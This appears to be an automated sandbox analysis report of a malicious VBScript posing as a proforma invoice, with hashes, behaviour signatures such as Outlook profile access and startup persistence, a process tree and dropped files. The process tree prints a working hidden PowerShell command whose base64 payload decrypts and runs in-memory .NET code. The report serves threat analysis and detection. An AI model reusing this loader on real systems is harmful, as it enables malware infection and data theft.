Analysis

  • max time kernel
    104s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/03/2025, 09:19

General

  • Target

    Sontheimer Proforma invoice.vbs

  • Size

    182KB

  • MD5

    beaf990fccbf28017a6e72ec92efeb43

  • SHA1

    4a9d9dbe2bdf4736cfc8f81c792e6d7c6cb7f1e7

  • SHA256

    2440d2269a8723ad47733885b1d51745828fa12710b6c3d3fad11d3010f7a89f

  • SHA512

    d7d5927648778a02b3b0320f714eba68ecfde4c80eccf699752b76f62404c58917809e9ca882f2d602068bdcaa9734fa1c707a1f6aea2c18b7c441641953de09

  • SSDEEP

    3072:69xHo0x7TLFPZZNV8wIxjdVHKp2DNjSElqHfhPy9iwb:69VxLhZV8wIxhVG0N8Hfe

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sontheimer Proforma invoice.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4580
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\temp_script.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\temp_script.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:316
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRkdWR5cG8gPSBAJw0KJHVzZXJweGROYW1lIHB4ZD0gJGVucHhkdjpVU0VweGRSTkFNRXB4ZDskcWh2cHhkID0gIkNweGQ6XFVzZXB4ZHJzXCR1cHhkc2VyTmFweGRtZVxkd3B4ZG0uYmF0cHhkIjtpZiBweGQoVGVzdHB4ZC1QYXRocHhkICRxaHZweGQpIHsgIHB4ZCAgV3JpcHhkdGUtSG9weGRzdCAiQnB4ZGF0Y2ggcHhkZmlsZSBweGRmb3VuZHB4ZDogJHFocHhkdiIgLUZweGRvcmVncnB4ZG91bmRDcHhkb2xvciBweGRDeWFuO3B4ZCAgICAkcHhkZmlsZUxweGRpbmVzIHB4ZD0gW1N5cHhkc3RlbS5weGRJTy5GaXB4ZGxlXTo6cHhkUmVhZEFweGRsbExpbnB4ZGVzKCRxcHhkaHYsIFtweGRTeXN0ZXB4ZG0uVGV4cHhkdC5FbmNweGRvZGluZ3B4ZF06OlVUcHhkRjgpOyBweGQgICBmb3B4ZHJlYWNocHhkICgkbGlweGRuZSBpbnB4ZCAkZmlscHhkZUxpbmVweGRzKSB7IHB4ZCAgICAgcHhkICBpZiBweGQoJGxpbnB4ZGUgLW1hcHhkdGNoICdweGReOjo6IHB4ZD8oLispcHhkJCcpIHtweGQgICAgIHB4ZCAgICAgcHhkICBXcmlweGR0ZS1Ib3B4ZHN0ICJJcHhkbmplY3RweGRpb24gY3B4ZG9kZSBkcHhkZXRlY3RweGRlZCBpbnB4ZCB0aGUgcHhkYmF0Y2hweGQgZmlsZXB4ZC4iIC1GcHhkb3JlZ3JweGRvdW5kQ3B4ZG9sb3IgcHhkQ3lhbjtweGQgICAgIHB4ZCAgICAgcHhkICB0cnlweGQgeyAgIHB4ZCAgICAgcHhkICAgICBweGQgICAkZHB4ZGVjb2RlcHhkZEJ5dGVweGRzID0gW3B4ZFN5c3RlcHhkbS5Db25weGR2ZXJ0XXB4ZDo6RnJvcHhkbUJhc2VweGQ2NFN0cnB4ZGluZygkcHhkbWF0Y2hweGRlc1sxXXB4ZC5UcmltcHhkKCkpOyBweGQgICAgIHB4ZCAgICAgcHhkICAgICBweGQkaW5qZXB4ZGN0aW9ucHhkQ29kZSBweGQ9IFtTeXB4ZHN0ZW0ucHhkVGV4dC5weGRFbmNvZHB4ZGluZ106cHhkOlVuaWNweGRvZGUuR3B4ZGV0U3RycHhkaW5nKCRweGRkZWNvZHB4ZGVkQnl0cHhkZXMpOyBweGQgICAgIHB4ZCAgICAgcHhkICAgICBweGRXcml0ZXB4ZC1Ib3N0cHhkICJJbmpweGRlY3Rpb3B4ZG4gY29kcHhkZSBkZWNweGRvZGVkIHB4ZHN1Y2NlcHhkc3NmdWxweGRseS4iIHB4ZC1Gb3JlcHhkZ3JvdW5weGRkQ29sb3B4ZHIgR3JlcHhkZW47ICBweGQgICAgIHB4ZCAgICAgcHhkICAgIFdweGRyaXRlLXB4ZEhvc3QgcHhkIkV4ZWNweGR1dGluZ3B4ZCBpbmplcHhkY3Rpb25weGQgY29kZXB4ZC4uLiIgcHhkLUZvcmVweGRncm91bnB4ZGRDb2xvcHhkciBZZWxweGRsb3c7IHB4ZCAgICAgcHhkICAgICBweGQgICAgIHB4ZEludm9rcHhkZS1FeHBweGRyZXNzaXB4ZG9uICRpcHhkbmplY3RweGRpb25Db3B4ZGRlOyAgcHhkICAgICBweGQgICAgIHB4ZCAgICBicHhkcmVhaztweGQgICAgIHB4ZCAgICAgcHhkICB9IGNweGRhdGNoIHB4ZHsgICAgcHhkICAgICBweGQgICAgIHB4ZCAgV3JpcHhkdGUtSG9weGRzdCAiRXB4ZHJyb3IgcHhkZHVyaW5weGRnIGRlY3B4ZG9kaW5ncHhkIG9yIGVweGR4ZWN1dHB4ZGluZyBpcHhkbmplY3RweGRpb24gY3B4ZG9kZTogcHhkJF8iIC1weGRGb3JlZ3B4ZHJvdW5kcHhkQ29sb3JweGQgUmVkO3B4ZCAgICAgcHhkICAgICBweGQgIH07IHB4ZCAgICAgcHhkICB9OyBweGQgICB9O3B4ZH0gZWxzcHhkZSB7ICBweGQgICAgV3B4ZHJpdGUtcHhkSG9zdCBweGQiU3lzdHB4ZGVtIEVycHhkcm9yOiBweGRCYXRjaHB4ZCBmaWxlcHhkIG5vdCBweGRmb3VuZHB4ZDogJHFocHhkdiIgLUZweGRvcmVncnB4ZG91bmRDcHhkb2xvciBweGRSZWQ7IHB4ZCAgIGV4cHhkaXQ7fTtweGRmdW5jdHB4ZGlvbiBrcHhkdGh2dShweGQkcGFyYXB4ZG1fdmFycHhkKXsJJGFweGRlc192YXB4ZHI9W1N5cHhkc3RlbS5weGRTZWN1cnB4ZGl0eS5DcHhkcnlwdG9weGRncmFwaHB4ZHkuQWVzcHhkXTo6Q3JweGRlYXRlKHB4ZCk7CSRhcHhkZXNfdmFweGRyLk1vZHB4ZGU9W1N5cHhkc3RlbS5weGRTZWN1cnB4ZGl0eS5DcHhkcnlwdG9weGRncmFwaHB4ZHkuQ2lwcHhkaGVyTW9weGRkZV06OnB4ZENCQzsJcHhkJGFlc19weGR2YXIuUHB4ZGFkZGlucHhkZz1bU3lweGRzdGVtLnB4ZFNlY3VycHhkaXR5LkNweGRyeXB0b3B4ZGdyYXBocHhkeS5QYWRweGRkaW5nTXB4ZG9kZV06cHhkOlBLQ1NweGQ3OwkkYXB4ZGVzX3ZhcHhkci5LZXlweGQ9W1N5c3B4ZHRlbS5DcHhkb252ZXJweGR0XTo6RnB4ZHJvbUJhcHhkc2U2NFNweGR0cmluZ3B4ZCgnMk5wcHhkbnhQd2hweGRnUGdNM3B4ZEErS2NxcHhkTXVkMXBweGR0NnBOc3B4ZGMzaGVncHhkT0xxekVweGRvUDVHY3B4ZD0nKTsJcHhkJGFlc19weGR2YXIuSXB4ZFY9W1N5cHhkc3RlbS5weGRDb252ZXB4ZHJ0XTo6cHhkRnJvbUJweGRhc2U2NHB4ZFN0cmlucHhkZygnMlRweGR1L3FCWnB4ZGJCTFpLcHhkaFc5V21weGRQeFdnZ3B4ZD09Jyk7cHhkCSRkZWNweGRyeXB0b3B4ZHJfdmFycHhkPSRhZXNweGRfdmFyLnB4ZENyZWF0cHhkZURlY3JweGR5cHRvcnB4ZCgpOwkkcHhkcmV0dXJweGRuX3ZhcnB4ZD0kZGVjcHhkcnlwdG9weGRyX3ZhcnB4ZC5UcmFucHhkc2Zvcm1weGRGaW5hbHB4ZEJsb2NrcHhkKCRwYXJweGRhbV92YXB4ZHIsIDAscHhkICRwYXJweGRhbV92YXB4ZHIuTGVucHhkZ3RoKTtweGQJJGRlY3B4ZHJ5cHRvcHhkcl92YXJweGQuRGlzcHB4ZG9zZSgpcHhkOwkkYWVweGRzX3ZhcnB4ZC5EaXNwcHhkb3NlKClweGQ7CSRyZXB4ZHR1cm5fcHhkdmFyO31weGRmdW5jdHB4ZGlvbiBycHhkYmNldShweGQkcGFyYXB4ZG1fdmFycHhkKXsJJGdweGRweXQ9TnB4ZGV3LU9icHhkamVjdCBweGRTeXN0ZXB4ZG0uSU8ucHhkTWVtb3JweGR5U3RyZXB4ZGFtKCwkcHhkcGFyYW1weGRfdmFyKXB4ZDsJJGdvcHhkamRjPU5weGRldy1PYnB4ZGplY3QgcHhkU3lzdGVweGRtLklPLnB4ZE1lbW9ycHhkeVN0cmVweGRhbTsJJHB4ZHR6ZmVqcHhkPU5ldy1weGRPYmplY3B4ZHQgU3lzcHhkdGVtLklweGRPLkNvbXB4ZHByZXNzcHhkaW9uLkdweGRaaXBTdHB4ZHJlYW0ocHhkJGdweXRweGQsIFtJT3B4ZC5Db21wcHhkcmVzc2lweGRvbi5Db3B4ZG1wcmVzcHhkc2lvbk1weGRvZGVdOnB4ZDpEZWNvcHhkbXByZXNweGRzKTsJJHB4ZHR6ZmVqcHhkLkNvcHlweGRUbygkZ3B4ZG9qZGMpcHhkOwkkdHpweGRmZWouRHB4ZGlzcG9zcHhkZSgpOwlweGQkZ3B5dHB4ZC5EaXNwcHhkb3NlKClweGQ7CSRnb3B4ZGpkYy5EcHhkaXNwb3NweGRlKCk7CXB4ZCRnb2pkcHhkYy5Ub0FweGRycmF5KHB4ZCk7fWZ1cHhkbmN0aW9weGRuIGh1a3B4ZG5sKCRwcHhkYXJhbV9weGR2YXIsJHB4ZHBhcmFtcHhkMl92YXJweGQpewkkaHB4ZGg9W1N5cHhkc3RlbS5weGRSZWZsZXB4ZGN0aW9ucHhkLkFzc2VweGRtYmx5XXB4ZDo6KCdkcHhkYW9MJ1tweGQtMS4uLXB4ZDRdIC1qcHhkb2luICdweGQnKShbYnB4ZHl0ZVtdcHhkXSRwYXJweGRhbV92YXB4ZHIpOwkkcHhkdWd1PSRweGRoaC5FbnB4ZHRyeVBvcHhkaW50OwlweGQkdWd1LnB4ZEludm9rcHhkZSgkbnVweGRsbCwgJHB4ZHBhcmFtcHhkMl92YXJweGQpO30kaHB4ZG9zdC5VcHhkSS5SYXdweGRVSS5XaXB4ZG5kb3dUcHhkaXRsZSBweGQ9ICRxaHB4ZHY7JGlqcHhkZj1bU3lweGRzdGVtLnB4ZElPLkZpcHhkbGVdOjpweGQoJ3R4ZXB4ZFRsbEFkcHhkYWVSJ1tweGQtMS4uLXB4ZDExXSAtcHhkam9pbiBweGQnJykoJHB4ZHFodikucHhkU3BsaXRweGQoW0VudnB4ZGlyb25tcHhkZW50XTpweGQ6TmV3THB4ZGluZSk7cHhkZm9yZWFweGRjaCAoJHB4ZG1ubHNxcHhkIGluICRweGRpamYpIHB4ZHsJaWYgcHhkKCRtbmxweGRzcS5TdHB4ZGFydHNXcHhkaXRoKCdweGQ6OiAnKXB4ZCkJewkJcHhkJHBxZWhweGQ9JG1ubHB4ZHNxLlN1cHhkYnN0cmlweGRuZygzKXB4ZDsJCWJycHhkZWFrOwlweGR9fSRxZ3B4ZHg9W3N0cHhkcmluZ1tweGRdXSRwcXB4ZGVoLlNwcHhkbGl0KCdweGRcJyk7JHB4ZGJ1eT1ycHhkYmNldSBweGQoa3RodnB4ZHUgKFtDcHhkb252ZXJweGR0XTo6RnB4ZHJvbUJhcHhkc2U2NFNweGR0cmluZ3B4ZCgkcWd4cHhkWzBdKSlweGQpOyRpdnB4ZHluPXJicHhkY2V1IChweGRrdGh2dXB4ZCAoW0NvcHhkbnZlcnRweGRdOjpGcnB4ZG9tQmFzcHhkZTY0U3RweGRyaW5nKHB4ZCRxZ3hbcHhkMV0pKSlweGQ7aHVrbnB4ZGwgJGJ1cHhkeSAkbnVweGRsbDtodXB4ZGtubCAkcHhkaXZ5biBweGQoLFtzdHB4ZHJpbmdbcHhkXV0gKCdweGQlKicpKXB4ZDsNCidADQoNCiRlc2JlZnMgPSAkZHVkeXBvIC1yZXBsYWNlICdweGQnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZXNiZWZzDQo=')) | Invoke-Expression"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:5688

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wpvi4dic.bv3.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\temp_script.bat

    Filesize

    169KB

    MD5

    e009b770959b12725712474645374d0c

    SHA1

    8e898422cb10bb5ccffa14a198f831bc6d993c03

    SHA256

    4c58ef38d745fd50f3d26a4fe523691531cdaef05f3d5e14d92f2236417b5f99

    SHA512

    ead89e455278b2ab6cb62351e5df01cdcb38c9d2717c1bf58daa5bc2455fd976c097637fb2252931fd63cc342d9d53526fceedcdd92064a238a024a6e7eb4d80

  • memory/5688-27-0x0000000006640000-0x000000000665A000-memory.dmp

    Filesize

    104KB

  • memory/5688-39-0x0000000074CDE000-0x0000000074CDF000-memory.dmp

    Filesize

    4KB

  • memory/5688-10-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/5688-9-0x0000000005650000-0x0000000005C78000-memory.dmp

    Filesize

    6.2MB

  • memory/5688-11-0x0000000005380000-0x00000000053A2000-memory.dmp

    Filesize

    136KB

  • memory/5688-12-0x0000000005420000-0x0000000005486000-memory.dmp

    Filesize

    408KB

  • memory/5688-13-0x0000000005490000-0x00000000054F6000-memory.dmp

    Filesize

    408KB

  • memory/5688-7-0x0000000002D90000-0x0000000002DC6000-memory.dmp

    Filesize

    216KB

  • memory/5688-23-0x0000000005C80000-0x0000000005FD4000-memory.dmp

    Filesize

    3.3MB

  • memory/5688-24-0x0000000006140000-0x000000000615E000-memory.dmp

    Filesize

    120KB

  • memory/5688-25-0x00000000061E0000-0x000000000622C000-memory.dmp

    Filesize

    304KB

  • memory/5688-26-0x0000000007A70000-0x00000000080EA000-memory.dmp

    Filesize

    6.5MB

  • memory/5688-8-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/5688-6-0x0000000074CDE000-0x0000000074CDF000-memory.dmp

    Filesize

    4KB

  • memory/5688-33-0x0000000007500000-0x0000000007508000-memory.dmp

    Filesize

    32KB

  • memory/5688-30-0x00000000080F0000-0x0000000008694000-memory.dmp

    Filesize

    5.6MB

  • memory/5688-32-0x0000000007530000-0x00000000075C2000-memory.dmp

    Filesize

    584KB

  • memory/5688-34-0x0000000007710000-0x0000000007720000-memory.dmp

    Filesize

    64KB

  • memory/5688-29-0x0000000006740000-0x0000000006762000-memory.dmp

    Filesize

    136KB

  • memory/5688-36-0x0000000007740000-0x000000000775E000-memory.dmp

    Filesize

    120KB

  • memory/5688-37-0x0000000007800000-0x000000000789C000-memory.dmp

    Filesize

    624KB

  • memory/5688-38-0x00000000079A0000-0x00000000079F0000-memory.dmp

    Filesize

    320KB

  • memory/5688-28-0x00000000073F0000-0x0000000007486000-memory.dmp

    Filesize

    600KB

  • memory/5688-40-0x0000000074CD0000-0x0000000075480000-memory.dmp

    Filesize

    7.7MB

  • memory/5688-41-0x0000000008970000-0x0000000008B32000-memory.dmp

    Filesize

    1.8MB

  • memory/5688-42-0x0000000007A50000-0x0000000007A5A000-memory.dmp

    Filesize

    40KB